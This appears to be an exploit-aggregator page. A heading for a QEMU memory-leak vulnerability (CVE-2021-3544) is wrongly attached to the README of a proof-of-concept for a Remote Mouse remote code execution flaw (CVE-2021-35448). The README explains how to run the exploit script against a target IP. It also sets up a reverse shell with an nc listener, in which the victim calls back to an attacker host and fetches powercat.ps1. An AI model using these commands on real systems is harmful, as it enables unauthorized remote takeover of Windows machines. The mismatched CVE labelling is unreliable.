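Related vulnerability
Title: QEMU security vulnerability (CVE-2021-3544)
Description: QEMU (Quick Emulator) is processor emulation software developed by the individual developer Fabrice Bellard of France. The software is fast and cross-platform. QEMU contains a security vulnerability. The vulnerability stems from a memory leak in vhost-user-gpu/vhost-user-gpu.c. The following products and versions are affected: QEMU: 5.0.0, 5.0.1, 5.1.0, 5.2.0, 6.0.0.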
Description
POC for CVE-2021-3544 based on https://www.exploit-db.com/exploits/49601
Introduction
# CVE-2021-35448 - Remote Mouse Exploit
## Description
This exploit targets the **CVE-2021-35448** vulnerability in the Remote Mouse application (formerly WiFi Mouse).
# POC
[CVE-2021-35448.webm](https://github.com/user-attachments/assets/2aa1ff4a-31c0-46e2-9abb-8bfb17bede61)
## Usage
### Basic Syntax
```bash
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
```
### Options
- `-t, --target`: Target IP address (required)
- `-p, --payload`: Custom command to execute
- `-r, --reverse`: Reverse shell in IP:PORT format
- `-l, --http`: Local HTTP server in IP:PORT format (required with -r)
### Usage Examples
#### 1. Custom Command
```bash
python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
```
#### 2. Reverse Shell (Recommended)
```bash
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
```
## Prerequisites
### Required Files
- `CVE-2021-35448.py`: Main exploitation script
- `powercat.ps1`: PowerShell script for reverse shells
### Target System
- Remote Mouse installed and running
- Windows system (tested on Windows 10)
## Warning
⚠️ **ETHICAL USE ONLY** ⚠️
This tool is intended for educational purposes and authorized penetration testing only. Unauthorized use of this exploit is illegal and may result in legal prosecution.
## References
- [WiFi Mouse 1.7.8.5 - Remote Code Execution](https://www.exploit-db.com/exploits/49601)
- [CVE-2021-35448 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-35448)
## Author
Developed for educational and ethical penetration testing purposes.
---
*Last updated: 2025*
File snapshot
[4.0K] /data/pocs/3153a55c54c02a4a62ef342606372c2ca1297fcb
├── [3.0K] CVE-2021-35448.py
├── [ 36K] powercat.ps1
└── [1.6K] README.md
0 directories, 3 files